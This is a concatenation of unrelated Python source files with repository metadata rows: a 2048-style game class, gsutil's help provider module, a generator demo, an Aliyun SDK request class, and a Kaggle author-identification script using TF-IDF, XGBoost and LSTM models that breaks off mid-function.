print(re.sub(r"[\,\[\]]", "|", option_row.__repr__()))
option_row[0].value = 4
option_row[1].value = 4
option_row[2].value = 0
option_row[3].value = 0
print("\nA:\n" + re.sub(r"[\,\[\]]", "|", option_row.__repr__()))
option_row[0].value = 4
option_row[1].value = 0
option_row[2].value = 0
option_row[3].value = 4
print("\nB:\n" + re.sub(r"[\,\[\]]", "|", option_row.__repr__()))
self.flag = -1
while self.flag < 0:
print("\033[32m2048 >>> \033[0m", end="")
inp = input()
if inp == "A":
print("\033[34mA rule will be followed throughout \033[0m")
self.flag = 1
elif inp == "B":
print("\033[34mB rule will be followed throughout \033[0m")
self.flag = 0
else:
print(
"\033[34mYou selected neither option, please select A or B \033[0m"
)
self.flag = -1
def empty_matrix(self):
"""
Creates an empty board
"""
return [
[Tile(index=(r, c)) for c in range(self.columns)] for r in range(self.rows)
]
def update_indexes(self):
"""
Update All indexes after moving
"""
for row, col in product(range(self.rows), range(self.columns)):
self.matrix[row][col].re_index((row, col))
def __repr__(self):
"""
Printer Function
"""
return (
"\033[33m"
+ re.sub(
r"[\,\[\]]", "|", "\n".join([row.__repr__() for row in self.matrix])
)
+ "\033[0m"
)
def compress(self):
"""
Compress Utility Function
"""
new_mat = self.empty_matrix()
for i in range(self.rows):
pos = 0
for j in range(self.columns):
if self.matrix[i][j].value != 0:
new_mat[i][pos] = deepcopy(self.matrix[i][j])
pos += 1
self.matrix.clear()
self.matrix = deepcopy(new_mat)
def merge(self, operation):
"""
Merge operation for tiles
"""
for i in range(self.rows):
for j in range(self.columns - 1):
if (
self.matrix[i][j].value == self.matrix[i][j + 1].value
and self.matrix[i][j].value != 0
):
if operation == "SUBTRACT":
self.matrix[i][j].value = 0
self.matrix[i][j].variables.clear()
else:
if operation == "ADD":
self.matrix[i][j].value *= 2
elif operation == "MULTIPLY":
self.matrix[i][j].value *= self.matrix[i][j].value
elif operation == "DIVIDE":
self.matrix[i][j].value = 1
self.matrix[i][j].variables.extend(
self.matrix[i][j + 1].variables
)
self.matrix[i][j + 1].value = 0
self.matrix[i][j + 1].variables.clear()
def reverse_matrix(self):
"""
Returns the reverse of matrix
"""
for row in range(self.rows):
self.matrix[row].reverse()
def transpose(self):
"""
Returns the transpose of matrix
"""
for row in range(self.rows):
for col in range(row):
self.matrix[row][col], self.matrix[col][row] = (
self.matrix[col][row],
self.matrix[row][col],
)
def move(self, direction, operation, verbose=True):
"""
Move Operation, Moves in the given direction and applies the given operation
"""
if direction == "UP":
self.transpose()
self.move("LEFT", operation, verbose=False)
self.transpose()
elif direction == "DOWN":
self.transpose()
self.move("RIGHT", operation, verbose=False)
self.transpose()
elif direction == "LEFT":
self.compress()
self.merge(operation)
if self.flag == 1:
self.compress()
elif direction == "RIGHT":
self.reverse_matrix()
self.move("LEFT", operation, verbose=False)
self.reverse_matrix()
else:
print("INVALID DIRECTION")
if not self.is_game_over() and verbose:
self.add_random_tile()
print(self)
self.update_indexes()
def assign(self, value, index):
"""
Assign Operation, Takes index and value and assigns value to that index
"""
x, y = index
x, y = x - 1, y - 1
if not self.is_valid(x, y):
raise WrongIndex(index, (1, 1), (self.rows, self.columns))
self.matrix[x][y].value = value
if value == 0:
self.matrix[x][y].variables.clear()
print(self)
def query(self, index):
"""
Returns the value on given index
"""
x, y = index
x, y = x - 1, y - 1
if not self.is_valid(x, y):
raise WrongIndex(index, (1, 1), (self.rows, self.columns))
elif self.empty_index(x, y):
raise EmptyTileQueryException(index)
value = self.matrix[x][y].value
print(value)
return value
def name(self, varName, index):
"""
Assigns some value to given varnames in memory
"""
x, y = index
x, y = x - 1, y - 1
if self.varExists(varName):
raise IdentifierExists(varName)
elif not self.is_valid(x, y):
raise WrongIndex(index, (1, 1), (self.rows, self.columns))
elif self.empty_index(x, y):
raise EmptyTileNamingException(index)
else:
self.matrix[x][y].variables.append(varName)
def add_random_tile(self, p=0.5):
"""
Adds a random tile to the board, being 2 or 4 with probability p, 1-p
"""
row, col = random.choice(
[
index
for index in product(range(self.rows), range(self.columns))
if self.matrix[index[0]][index[1]].value == 0
],
)
self.matrix[row][col].value = 2 if random.random() <= p else 4
def is_game_over(self):
"""
Checks if the game is over
"""
dx = [0, 1, 0, -1]
dy = [1, 0, -1, 0]
for i, j in product(range(self.rows), range(self.columns)):
if self.matrix[i][j].value == 0:
return False
for k in range(4):
x = i + dx[k]
y = j + dy[k]
if (
self.is_valid(x, y)
and self.matrix[x][y].value == self.matrix[i][j].value
):
return False
return True
def empty_index(self, x, y):
"""
Checks if the tile is empty for given row, col
"""
return self.matrix[x][y].value == 0
def is_valid(self, x, y):
"""
checks if the index is out of bounds
"""
return x >= 0 and y >= 0 and x < self.rows and y < self.columns
def get_identifiers(self):
"""
Gets string of space separated index / variables
"""
var_out = ""
for row, col in product(range(self.rows), range(self.columns)):
tile = self.matrix[row][col]
index = "%d,%d" % (row + 1, col + 1)
var = ",".join(tile.variables)
if var:
var_out += index + var + "\40"
return var_out
def varExists(self, varName):
"""
Checks if a variable already exists
"""
for row in range(self.rows):
for col in range(self.columns):
if varName in self.matrix[row][col].variables:
return (row + 1, col + 1)
return None
def get_row_major(self):
"""
Gets row major output
"""
row_maj = []
for row in self.matrix:
row_maj.extend([str(tile.value) for tile in row])
return "\40".join(row_maj)
def eout(self):
"""
Sends the message to stderr
"""
print("%s %s" % (self.get_row_major(), self.get_identifiers()), file=sys.stderr)
| [
"someshsingh9414@gmail.com"
] | someshsingh9414@gmail.com |
7f2bc13f3b49ac4bb99cd8a03c9d886de3c9552c | a59d55ecf9054d0750168d3ca9cc62a0f2b28b95 | /.install/.backup/platform/gsutil/gslib/help_provider.py | adf4c90d50cad5e50dfe990e242fb236c5bc9fdd | [
"Apache-2.0",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | bopopescu/google-cloud-sdk | bb2746ff020c87271398196f21a646d9d8689348 | b34e6a18f1e89673508166acce816111c3421e4b | refs/heads/master | 2022-11-26T07:33:32.877033 | 2014-06-29T20:43:23 | 2014-06-29T20:43:23 | 282,306,367 | 0 | 0 | NOASSERTION | 2020-07-24T20:04:47 | 2020-07-24T20:04:46 | null | UTF-8 | Python | false | false | 3,604 | py | # Copyright 2012 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from gslib.exception import CommandException
class HelpType(object):
COMMAND_HELP = 'command_help'
ADDITIONAL_HELP = 'additional_help'
ALL_HELP_TYPES = [HelpType.COMMAND_HELP, HelpType.ADDITIONAL_HELP]
# help_spec key constants.
HELP_NAME = 'help_name'
HELP_NAME_ALIASES = 'help_name_aliases'
HELP_TYPE = 'help_type'
HELP_ONE_LINE_SUMMARY = 'help_one_line_summary'
HELP_TEXT = 'help_text'
SUBCOMMAND_HELP_TEXT = 'subcommand_help_text'
# Constants enforced by SanityCheck
MAX_HELP_NAME_LEN = 15
MIN_ONE_LINE_SUMMARY_LEN = 10
MAX_ONE_LINE_SUMMARY_LEN = 80 - MAX_HELP_NAME_LEN
REQUIRED_SPEC_KEYS = [HELP_NAME, HELP_NAME_ALIASES, HELP_TYPE,
HELP_ONE_LINE_SUMMARY, HELP_TEXT]
DESCRIPTION_PREFIX = """
<B>DESCRIPTION</B>"""
SYNOPSIS_PREFIX = """
<B>SYNOPSIS</B>"""
class HelpProvider(object):
"""Interface for providing help."""
# Each subclass must define the following map.
help_spec = {
# Name of command or auxiliary help info for which this help applies.
HELP_NAME : None,
# List of help name aliases.
HELP_NAME_ALIASES : None,
# HelpType.
HELP_TYPE : None,
# One line summary of this help.
HELP_ONE_LINE_SUMMARY : None,
# The full help text.
HELP_TEXT : None,
}
# This is a static helper instead of a class method because the help loader
# (gslib.commands.help._LoadHelpMaps()) operates on classes not instances.
def SanityCheck(help_provider, help_name_map):
"""Helper for checking that a HelpProvider has minimally adequate content."""
for k in REQUIRED_SPEC_KEYS:
if k not in help_provider.help_spec or help_provider.help_spec[k] is None:
raise CommandException('"%s" help implementation is missing %s '
'specification' % (help_provider.help_name, k))
# Sanity check the content.
assert (len(help_provider.help_spec[HELP_NAME]) > 1
and len(help_provider.help_spec[HELP_NAME]) < MAX_HELP_NAME_LEN)
for hna in help_provider.help_spec[HELP_NAME_ALIASES]:
assert len(hna) > 0
one_line_summary_len = len(help_provider.help_spec[HELP_ONE_LINE_SUMMARY])
assert (one_line_summary_len > MIN_ONE_LINE_SUMMARY_LEN
and one_line_summary_len < MAX_ONE_LINE_SUMMARY_LEN)
assert len(help_provider.help_spec[HELP_TEXT]) > 10
# Ensure there are no dupe help names or aliases across commands.
name_check_list = [help_provider.help_spec[HELP_NAME]]
name_check_list.extend(help_provider.help_spec[HELP_NAME_ALIASES])
for name_or_alias in name_check_list:
if help_name_map.has_key(name_or_alias):
raise CommandException(
'Duplicate help name/alias "%s" found while loading help from %s. '
'That name/alias was already taken by %s' % (name_or_alias,
help_provider.__module__, help_name_map[name_or_alias].__module__))
def CreateHelpText(synopsis, description):
"""Helper for adding help text headers given synopsis and description."""
return SYNOPSIS_PREFIX + synopsis + DESCRIPTION_PREFIX + description
| [
"alfred.wechselberger@technologyhatchery.com"
] | alfred.wechselberger@technologyhatchery.com |
c614a7b17eb2294bdf098e4b3faa84a86a3ed2d9 | 5143b06ce91c1640bd9622c7245d01b1ddc050c8 | /generators/classes.py | be0d37403cce3550fcfaf934aea58cce1b4cc561 | [] | no_license | jpraychev/code-snippets | 55447f40516f834ad8ae75bc9bce7bfd036b7395 | 87694ec4763e75304fb3b3738029f7a113833c0f | refs/heads/master | 2023-04-16T09:43:19.144942 | 2021-04-27T06:25:13 | 2021-04-27T06:25:13 | 340,878,553 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,095 | py |
import sys
import random
import itertools
class RandomNumbers(object):
def __init__(self, arr):
self.arr = arr
def __iter__(self):
for num in self.arr:
yield num
# arr = []
# for _ in range(10):
# arr.append(random.randint(1,100))
arr = [random.randint(1,100) for _ in range(10)]
print(arr)
def gen_func1(arr):
for x in arr:
yield x
# def gen_func(num):
# for n in num:
# yield n
def gen_func(n):
m = 0
while m < n:
yield random.randint(1,100)
m += 1
iter_obj = gen_func(10)
# a,b = itertools.tee(iter_obj, 2)
# print(a)
# print(b)
# print(list(a))
# print(list(b))
def get_average(gen):
total = sum(gen)
print(f'Random numbers -> {list(gen)}')
print(f'Total -> {total}')
for num in gen:
yield round(100 * num / total,2)
test1 = gen_func1(arr)
# print(test1)s
test2 = get_average(test1)
# print(test2.__next__())
obj = RandomNumbers(arr)
# obj = gen_func1(arr)
a = iter(obj)
b = iter(obj)
print(a)
print(b)
print(f'Average -> {list(get_average(obj))}') | [
"jpraychev@gmail.com"
] | jpraychev@gmail.com |
48e2d7509c3ff795db0dc5f1698c5858c5e81c7b | ccbfc7818c0b75929a1dfae41dc061d5e0b78519 | /aliyun-openapi-python-sdk-master/aliyun-python-sdk-cs/aliyunsdkcs/request/v20151215/DescribeAgilityTunnelAgentInfoRequest.py | 37758b4a66546675df1e6431acbd485dd825bb85 | [
"Apache-2.0"
] | permissive | P79N6A/dysms_python | 44b634ffb2856b81d5f79f65889bfd5232a9b546 | f44877b35817e103eed469a637813efffa1be3e4 | refs/heads/master | 2020-04-28T15:25:00.368913 | 2019-03-13T07:52:34 | 2019-03-13T07:52:34 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,210 | py | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
#
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from aliyunsdkcore.request import RoaRequest
class DescribeAgilityTunnelAgentInfoRequest(RoaRequest):
def __init__(self):
RoaRequest.__init__(self, 'CS', '2015-12-15', 'DescribeAgilityTunnelAgentInfo')
self.set_uri_pattern('/agility/[Token]/agent_info')
self.set_method('GET')
def get_Token(self):
return self.get_path_params().get('Token')
def set_Token(self,Token):
self.add_path_param('Token',Token) | [
"1478458905@qq.com"
] | 1478458905@qq.com |
ce2ff9a43105c7f3fdb86d05f4e307ccfedf72bd | eff821d00430ca165effe3ec1c3f4d3ee5f84702 | /spooky_author_identification/spooky_author_identification.py | 60a138a8b5681722dc5084f0258ede9f0d6af986 | [] | no_license | zzb5233/kaggle_project | b1e3aae9f82006fe3f45e603ed6a169343dda114 | 7273f65d55a27cc22b1364721c733c8b2a6f3b84 | refs/heads/master | 2020-04-07T08:51:18.969996 | 2018-12-27T13:07:17 | 2018-12-27T13:07:17 | 158,230,438 | 1 | 0 | null | null | null | null | WINDOWS-1252 | Python | false | false | 23,760 | py | import pandas as pd
import numpy as np
import xgboost as xgb
from tqdm import tqdm
from sklearn.svm import SVC
from keras.models import Sequential
from keras.layers.recurrent import LSTM, GRU
from keras.layers.core import Dense, Activation, Dropout
from keras.layers.embeddings import Embedding
from keras.layers.normalization import BatchNormalization
from keras.utils import np_utils
from sklearn import preprocessing, decomposition, model_selection, metrics, pipeline
from sklearn.model_selection import GridSearchCV
from sklearn.feature_extraction.text import TfidfVectorizer, CountVectorizer
from sklearn.decomposition import TruncatedSVD
from sklearn.linear_model import LogisticRegression
from sklearn.model_selection import train_test_split
from sklearn.naive_bayes import MultinomialNB
from keras.layers import GlobalMaxPooling1D, Conv1D, MaxPooling1D, Flatten, Bidirectional, SpatialDropout1D
from keras.preprocessing import sequence, text
from keras.callbacks import EarlyStopping
from nltk import word_tokenize
from nltk.corpus import stopwords
stop_words = stopwords.words('english')
#´ò¿ªÎļþ
train = pd.read_csv('./train.csv')
test = pd.read_csv('./test.csv')
sample = pd.read_csv('./sample_submission.csv')
def multiclass_logloss(actual, predicted, eps=1e-15):
"""Multi class version of Logarithmic Loss metric.
:param actual: Array containing the actual target classes
:param predicted: Matrix with class predictions, one probability per class
"""
# Convert 'actual' to a binary array if it's not already:
if len(actual.shape) == 1:
actual2 = np.zeros((actual.shape[0], predicted.shape[1]))
for i, val in enumerate(actual):
actual2[i, val] = 1
actual = actual2
clip = np.clip(predicted, eps, 1 - eps)
rows = actual.shape[0]
vsota = np.sum(actual * np.log(clip))
return -1.0 / rows * vsota
lbl_enc = preprocessing.LabelEncoder()
y = lbl_enc.fit_transform(train.author.values)
xtrain, xvalid, ytrain, yvalid = train_test_split(train.text.values, y, stratify=y, random_state=42, test_size=0.1, shuffle=True)
print (xtrain.shape)
print (xvalid.shape)
# Always start with these features. They work (almost) everytime!
tfv = TfidfVectorizer(min_df=3, max_features=None,
strip_accents='unicode', analyzer='word',token_pattern=r'\w{1,}',
ngram_range=(1, 3), use_idf=1,smooth_idf=1,sublinear_tf=1,
stop_words = 'english')
# Fitting TF-IDF to both training and test sets (semi-supervised learning)
tfv.fit(list(xtrain) + list(xvalid))
xtrain_tfv = tfv.transform(xtrain)
xvalid_tfv = tfv.transform(xvalid)
# Fitting a simple Logistic Regression on TFIDF
clf = LogisticRegression(C=1.0)
clf.fit(xtrain_tfv, ytrain)
predictions = clf.predict_proba(xvalid_tfv)
print ("logloss: %0.3f " % multiclass_logloss(yvalid, predictions))
ctv = CountVectorizer(analyzer='word',token_pattern=r'\w{1,}',
ngram_range=(1, 3), stop_words = 'english')
# Fitting Count Vectorizer to both training and test sets (semi-supervised learning)
ctv.fit(list(xtrain) + list(xvalid))
xtrain_ctv = ctv.transform(xtrain)
xvalid_ctv = ctv.transform(xvalid)
# Fitting a simple Logistic Regression on Counts
clf = LogisticRegression(C=1.0)
clf.fit(xtrain_ctv, ytrain)
predictions = clf.predict_proba(xvalid_ctv)
print ("logloss: %0.3f " % multiclass_logloss(yvalid, predictions))
clf = MultinomialNB()
clf.fit(xtrain_tfv, ytrain)
predictions = clf.predict_proba(xvalid_tfv)
print ("logloss: %0.3f " % multiclass_logloss(yvalid, predictions))
# Fitting a simple Naive Bayes on Counts
clf = MultinomialNB()
clf.fit(xtrain_ctv, ytrain)
predictions = clf.predict_proba(xvalid_ctv)
print ("logloss: %0.3f " % multiclass_logloss(yvalid, predictions))
# Apply SVD, I chose 120 components. 120-200 components are good enough for SVM model.
svd = decomposition.TruncatedSVD(n_components=120)
svd.fit(xtrain_tfv)
xtrain_svd = svd.transform(xtrain_tfv)
xvalid_svd = svd.transform(xvalid_tfv)
# Scale the data obtained from SVD. Renaming variable to reuse without scaling.
scl = preprocessing.StandardScaler()
scl.fit(xtrain_svd)
xtrain_svd_scl = scl.transform(xtrain_svd)
xvalid_svd_scl = scl.transform(xvalid_svd)
# Fitting a simple SVM
clf = SVC(C=1.0, probability=True) # since we need probabilities
clf.fit(xtrain_svd_scl, ytrain)
predictions = clf.predict_proba(xvalid_svd_scl)
print ("logloss: %0.3f " % multiclass_logloss(yvalid, predictions))
# Fitting a simple xgboost on tf-idf
clf = xgb.XGBClassifier(max_depth=7, n_estimators=200, colsample_bytree=0.8,
subsample=0.8, nthread=10, learning_rate=0.1)
clf.fit(xtrain_tfv.tocsc(), ytrain)
predictions = clf.predict_proba(xvalid_tfv.tocsc())
print ("logloss: %0.3f " % multiclass_logloss(yvalid, predictions))
# Fitting a simple xgboost on tf-idf
clf = xgb.XGBClassifier(max_depth=7, n_estimators=200, colsample_bytree=0.8,
subsample=0.8, nthread=10, learning_rate=0.1)
clf.fit(xtrain_ctv.tocsc(), ytrain)
predictions = clf.predict_proba(xvalid_ctv.tocsc())
print ("logloss: %0.3f " % multiclass_logloss(yvalid, predictions))
# Fitting a simple xgboost on tf-idf svd features
clf = xgb.XGBClassifier(max_depth=7, n_estimators=200, colsample_bytree=0.8,
subsample=0.8, nthread=10, learning_rate=0.1)
clf.fit(xtrain_svd, ytrain)
predictions = clf.predict_proba(xvalid_svd)
print ("logloss: %0.3f " % multiclass_logloss(yvalid, predictions))
# Fitting a simple xgboost on tf-idf svd features
clf = xgb.XGBClassifier(nthread=10)
clf.fit(xtrain_svd, ytrain)
predictions = clf.predict_proba(xvalid_svd)
print ("logloss: %0.3f " % multiclass_logloss(yvalid, predictions))
mll_scorer = metrics.make_scorer(multiclass_logloss, greater_is_better=False, needs_proba=True)
# Initialize SVD
svd = TruncatedSVD()
# Initialize the standard scaler
scl = preprocessing.StandardScaler()
# We will use logistic regression here..
lr_model = LogisticRegression()
# Create the pipeline
clf = pipeline.Pipeline([('svd', svd), ('scl', scl), ('lr', lr_model)])
param_grid = {'svd__n_components' : [120, 180], 'lr__C': [0.1, 1.0, 10], 'lr__penalty': ['l1', 'l2']}
# Initialize Grid Search Model
model = GridSearchCV(estimator=clf, param_grid=param_grid, scoring=mll_scorer, verbose=10, n_jobs=-1, iid=True, refit=True, cv=2)
# Fit Grid Search Model
model.fit(xtrain_tfv, ytrain) # we can use the full data here but im only using xtrain
print("Best score: %0.3f" % model.best_score_)
print("Best parameters set:")
best_parameters = model.best_estimator_.get_params()
for param_name in sorted(param_grid.keys()):
print("\t%s: %r" % (param_name, best_parameters[param_name]))
nb_model = MultinomialNB()
# Create the pipeline
clf = pipeline.Pipeline([('nb', nb_model)])
# parameter grid
param_grid = {'nb__alpha': [0.001, 0.01, 0.1, 1, 10, 100]}
# Initialize Grid Search Model
model = GridSearchCV(estimator=clf, param_grid=param_grid, scoring=mll_scorer, verbose=10, n_jobs=-1, iid=True, refit=True, cv=2)
# Fit Grid Search Model
model.fit(xtrain_tfv, ytrain) # we can use the full data here but im only using xtrain.
print("Best score: %0.3f" % model.best_score_)
print("Best parameters set:")
best_parameters = model.best_estimator_.get_params()
for param_name in sorted(param_grid.keys()):
print("\t%s: %r" % (param_name, best_parameters[param_name]))
# load the GloVe vectors in a dictionary:
embeddings_index = {}
f = open('glove.840B.300d.txt')
for line in tqdm(f):
values = line.split()
word = values[0]
coefs = np.asarray(values[1:], dtype='float32')
embeddings_index[word] = coefs
f.close()
print('Found %s word vectors.' % len(embeddings_index))
# In[ ]:
# this function creates a normalized vector for the whole sentence
def sent2vec(s):
words = str(s).lower().decode('utf-8')
words = word_tokenize(words)
words = [w for w in words if not w in stop_words]
words = [w for w in words if w.isalpha()]
M = []
for w in words:
try:
M.append(embeddings_index[w])
except:
continue
M = np.array(M)
v = M.sum(axis=0)
if type(v) != np.ndarray:
return np.zeros(300)
return v / np.sqrt((v ** 2).sum())
# In[ ]:
xtrain_glove = [sent2vec(x) for x in tqdm(xtrain)]
xvalid_glove = [sent2vec(x) for x in tqdm(xvalid)]
# In[ ]:
xtrain_glove = np.array(xtrain_glove)
xvalid_glove = np.array(xvalid_glove)
# In[ ]:
# Fitting a simple xgboost on glove features
clf = xgb.XGBClassifier(nthread=10, silent=False)
clf.fit(xtrain_glove, ytrain)
predictions = clf.predict_proba(xvalid_glove)
print ("logloss: %0.3f " % multiclass_logloss(yvalid, predictions))
# In[ ]:
# Fitting a simple xgboost on glove features
clf = xgb.XGBClassifier(max_depth=7, n_estimators=200, colsample_bytree=0.8,
subsample=0.8, nthread=10, learning_rate=0.1, silent=False)
clf.fit(xtrain_glove, ytrain)
predictions = clf.predict_proba(xvalid_glove)
print ("logloss: %0.3f " % multiclass_logloss(yvalid, predictions))
# In[ ]:
# scale the data before any neural net:
scl = preprocessing.StandardScaler()
xtrain_glove_scl = scl.fit_transform(xtrain_glove)
xvalid_glove_scl = scl.transform(xvalid_glove)
# In[ ]:
# we need to binarize the labels for the neural net
ytrain_enc = np_utils.to_categorical(ytrain)
yvalid_enc = np_utils.to_categorical(yvalid)
# In[ ]:
# create a simple 3 layer sequential neural net
model = Sequential()
model.add(Dense(300, input_dim=300, activation='relu'))
model.add(Dropout(0.2))
model.add(BatchNormalization())
model.add(Dense(300, activation='relu'))
model.add(Dropout(0.3))
model.add(BatchNormalization())
model.add(Dense(3))
model.add(Activation('softmax'))
# compile the model
model.compile(loss='categorical_crossentropy', optimizer='adam')
# In[ ]:
model.fit(xtrain_glove_scl, y=ytrain_enc, batch_size=64,
epochs=5, verbose=1,
validation_data=(xvalid_glove_scl, yvalid_enc))
# In[ ]:
# using keras tokenizer here
token = text.Tokenizer(num_words=None)
max_len = 70
token.fit_on_texts(list(xtrain) + list(xvalid))
xtrain_seq = token.texts_to_sequences(xtrain)
xvalid_seq = token.texts_to_sequences(xvalid)
# zero pad the sequences
xtrain_pad = sequence.pad_sequences(xtrain_seq, maxlen=max_len)
xvalid_pad = sequence.pad_sequences(xvalid_seq, maxlen=max_len)
word_index = token.word_index
# In[ ]:
# create an embedding matrix for the words we have in the dataset
embedding_matrix = np.zeros((len(word_index) + 1, 300))
for word, i in tqdm(word_index.items()):
embedding_vector = embeddings_index.get(word)
if embedding_vector is not None:
embedding_matrix[i] = embedding_vector
# In[ ]:
# A simple LSTM with glove embeddings and two dense layers
model = Sequential()
model.add(Embedding(len(word_index) + 1,
300,
weights=[embedding_matrix],
input_length=max_len,
trainable=False))
model.add(SpatialDropout1D(0.3))
model.add(LSTM(100, dropout=0.3, recurrent_dropout=0.3))
model.add(Dense(1024, activation='relu'))
model.add(Dropout(0.8))
model.add(Dense(1024, activation='relu'))
model.add(Dropout(0.8))
model.add(Dense(3))
model.add(Activation('softmax'))
model.compile(loss='categorical_crossentropy', optimizer='adam')
# In[ ]:
model.fit(xtrain_pad, y=ytrain_enc, batch_size=512, epochs=100, verbose=1, validation_data=(xvalid_pad, yvalid_enc))
# In[ ]:
# A simple LSTM with glove embeddings and two dense layers
model = Sequential()
model.add(Embedding(len(word_index) + 1,
300,
weights=[embedding_matrix],
input_length=max_len,
trainable=False))
model.add(SpatialDropout1D(0.3))
model.add(LSTM(300, dropout=0.3, recurrent_dropout=0.3))
model.add(Dense(1024, activation='relu'))
model.add(Dropout(0.8))
model.add(Dense(1024, activation='relu'))
model.add(Dropout(0.8))
model.add(Dense(3))
model.add(Activation('softmax'))
model.compile(loss='categorical_crossentropy', optimizer='adam')
# Fit the model with early stopping callback
earlystop = EarlyStopping(monitor='val_loss', min_delta=0, patience=3, verbose=0, mode='auto')
model.fit(xtrain_pad, y=ytrain_enc, batch_size=512, epochs=100,
verbose=1, validation_data=(xvalid_pad, yvalid_enc), callbacks=[earlystop])
# In[ ]:
# A simple bidirectional LSTM with glove embeddings and two dense layers
model = Sequential()
model.add(Embedding(len(word_index) + 1,
300,
weights=[embedding_matrix],
input_length=max_len,
trainable=False))
model.add(SpatialDropout1D(0.3))
model.add(Bidirectional(LSTM(300, dropout=0.3, recurrent_dropout=0.3)))
model.add(Dense(1024, activation='relu'))
model.add(Dropout(0.8))
model.add(Dense(1024, activation='relu'))
model.add(Dropout(0.8))
model.add(Dense(3))
model.add(Activation('softmax'))
model.compile(loss='categorical_crossentropy', optimizer='adam')
# Fit the model with early stopping callback
earlystop = EarlyStopping(monitor='val_loss', min_delta=0, patience=3, verbose=0, mode='auto')
model.fit(xtrain_pad, y=ytrain_enc, batch_size=512, epochs=100,
verbose=1, validation_data=(xvalid_pad, yvalid_enc), callbacks=[earlystop])
# In[ ]:
# GRU with glove embeddings and two dense layers
model = Sequential()
model.add(Embedding(len(word_index) + 1,
300,
weights=[embedding_matrix],
input_length=max_len,
trainable=False))
model.add(SpatialDropout1D(0.3))
model.add(GRU(300, dropout=0.3, recurrent_dropout=0.3, return_sequences=True))
model.add(GRU(300, dropout=0.3, recurrent_dropout=0.3))
model.add(Dense(1024, activation='relu'))
model.add(Dropout(0.8))
model.add(Dense(1024, activation='relu'))
model.add(Dropout(0.8))
model.add(Dense(3))
model.add(Activation('softmax'))
model.compile(loss='categorical_crossentropy', optimizer='adam')
# Fit the model with early stopping callback
earlystop = EarlyStopping(monitor='val_loss', min_delta=0, patience=3, verbose=0, mode='auto')
model.fit(xtrain_pad, y=ytrain_enc, batch_size=512, epochs=100,
verbose=1, validation_data=(xvalid_pad, yvalid_enc), callbacks=[earlystop])
# In[ ]:
# this is the main ensembling class. how to use it is in the next cell!
import numpy as np
from sklearn.metrics import roc_auc_score
from sklearn.preprocessing import LabelEncoder
from sklearn.model_selection import StratifiedKFold, KFold
import pandas as pd
import os
import sys
import logging
logging.basicConfig(
level=logging.DEBUG,
format="[%(asctime)s] %(levelname)s %(message)s",
datefmt="%H:%M:%S", stream=sys.stdout)
logger = logging.getLogger(__name__)
class Ensembler(object):
def __init__(self, model_dict, num_folds=3, task_type='classification', optimize=roc_auc_score,
lower_is_better=False, save_path=None):
"""
Ensembler init function
:param model_dict: model dictionary, see README for its format
:param num_folds: the number of folds for ensembling
:param task_type: classification or regression
:param optimize: the function to optimize for, e.g. AUC, logloss, etc. Must have two arguments y_test and y_pred
:param lower_is_better: is lower value of optimization function better or higher
:param save_path: path to which model pickles will be dumped to along with generated predictions, or None
"""
self.model_dict = model_dict
self.levels = len(self.model_dict)
self.num_folds = num_folds
self.task_type = task_type
self.optimize = optimize
self.lower_is_better = lower_is_better
self.save_path = save_path
self.training_data = None
self.test_data = None
self.y = None
self.lbl_enc = None
self.y_enc = None
self.train_prediction_dict = None
self.test_prediction_dict = None
self.num_classes = None
def fit(self, training_data, y, lentrain):
"""
:param training_data: training data in tabular format
:param y: binary, multi-class or regression
:return: chain of models to be used in prediction
"""
self.training_data = training_data
self.y = y
if self.task_type == 'classification':
self.num_classes = len(np.unique(self.y))
logger.info("Found %d classes", self.num_classes)
self.lbl_enc = LabelEncoder()
self.y_enc = self.lbl_enc.fit_transform(self.y)
kf = StratifiedKFold(n_splits=self.num_folds)
train_prediction_shape = (lentrain, self.num_classes)
else:
self.num_classes = -1
self.y_enc = self.y
kf = KFold(n_splits=self.num_folds)
train_prediction_shape = (lentrain, 1)
self.train_prediction_dict = {}
for level in range(self.levels):
self.train_prediction_dict[level] = np.zeros((train_prediction_shape[0],
train_prediction_shape[1] * len(self.model_dict[level])))
for level in range(self.levels):
if level == 0:
temp_train = self.training_data
else:
temp_train = self.train_prediction_dict[level - 1]
for model_num, model in enumerate(self.model_dict[level]):
validation_scores = []
foldnum = 1
for train_index, valid_index in kf.split(self.train_prediction_dict[0], self.y_enc):
logger.info("Training Level %d Fold # %d. Model # %d", level, foldnum, model_num)
if level != 0:
l_training_data = temp_train[train_index]
l_validation_data = temp_train[valid_index]
model.fit(l_training_data, self.y_enc[train_index])
else:
l0_training_data = temp_train[0][model_num]
if type(l0_training_data) == list:
l_training_data = [x[train_index] for x in l0_training_data]
l_validation_data = [x[valid_index] for x in l0_training_data]
else:
l_training_data = l0_training_data[train_index]
l_validation_data = l0_training_data[valid_index]
model.fit(l_training_data, self.y_enc[train_index])
logger.info("Predicting Level %d. Fold # %d. Model # %d", level, foldnum, model_num)
if self.task_type == 'classification':
temp_train_predictions = model.predict_proba(l_validation_data)
self.train_prediction_dict[level][valid_index,
(model_num * self.num_classes):(model_num * self.num_classes) +
self.num_classes] = temp_train_predictions
else:
temp_train_predictions = model.predict(l_validation_data)
self.train_prediction_dict[level][valid_index, model_num] = temp_train_predictions
validation_score = self.optimize(self.y_enc[valid_index], temp_train_predictions)
validation_scores.append(validation_score)
logger.info("Level %d. Fold # %d. Model # %d. Validation Score = %f", level, foldnum, model_num,
validation_score)
foldnum += 1
avg_score = np.mean(validation_scores)
std_score = np.std(validation_scores)
logger.info("Level %d. Model # %d. Mean Score = %f. Std Dev = %f", level, model_num,
